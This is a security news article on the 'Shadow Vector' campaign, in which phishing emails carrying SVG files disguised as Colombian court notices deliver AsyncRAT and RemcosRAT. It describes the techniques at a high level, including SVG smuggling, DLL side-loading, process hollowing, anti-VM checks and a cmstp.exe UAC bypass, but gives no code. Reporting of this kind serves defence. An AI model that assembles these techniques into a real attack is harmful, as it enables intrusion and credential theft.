Shadow Vector Malware Uses SVG Images to Deliver AsyncRAT and RemcosRAT Payloads

Acronis Threat Research Unit (TRU) has discovered a startling development: a malicious campaign called “Shadow Vector” is actively targeting Colombian users using malicious Scalable Vector Graphics (SVG) files, a novel attack vector.

Disguised as urgent court notifications, these SVG files are embedded in spear-phishing emails that impersonate trusted national institutions, exploiting public trust to trick victims into downloading dangerous payloads.

This campaign represents a growing trend of abusing trusted file formats like SVG, now formally recognized as a subtechnique in the MITRE ATT&CK framework under “SVG smuggling,” due to their ability to render cleanly in browsers, support embedded scripts, and often bypass traditional email security filters.

A Sophisticated Phishing Campaign Targets Colombia

The Shadow Vector operation employs a meticulously crafted delivery mechanism that starts with phishing emails containing SVG attachments designed to mimic official legal documents.

These files include embedded links labeled as access to further documentation, redirecting users to password-protected ZIP archives hosted on public platforms like Bitbucket, Discord CDN, and YDRAY.

Once extracted, these archives reveal a mix of legitimate executables and malicious DLLs that initiate a multistage infection chain through DLL side-loading a technique where a trusted process unwittingly loads malicious code.

According to Acronis Report, this ultimately deploys remote access tools (RATs) such as AsyncRAT and RemcosRAT, which are notorious for enabling keylogging, credential theft (including banking details), and full remote control of compromised systems.

The use of password protection adds a layer of user interaction, reducing the likelihood of automated detection while increasing victim engagement.

Evolving Tactics with Multistage Infection Chains

Further technical analysis reveals the campaign’s sophistication in evading analysis and maintaining persistence.

For instance, AsyncRAT payloads are hidden within manipulated DLLs like “mscorlib.dll,” with intentionally offset PE headers to disrupt automated parsing tools.

Techniques such as process hollowing, where malicious code is injected into legitimate processes like AddInProcess32.exe, allow the malware to operate under the guise of trusted system binaries.

Additionally, Shadow Vector incorporates anti-analysis checks, terminating execution if it detects virtual environments or debuggers by scanning for indicators like VMware or VirtualBox.

The latest iterations also feature a modular .NET loader akin to Katz Stealer, using JavaScript and PowerShell stagers, UAC bypass via cmstp.exe, and in-memory execution to leave minimal disk footprints.

Encrypted configurations, Portuguese-language strings, and dynamic payload retrieval from platforms like the Internet Archive suggest potential ties to Brazilian cybercrime ecosystems, hinting at cross-regional collaboration.

This evolving threat, while currently focused on data theft, poses a latent risk of escalating to ransomware deployment given its capabilities.

The Superior Council of Judicature in Colombia has issued warnings about these impersonation tactics, urging vigilance.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates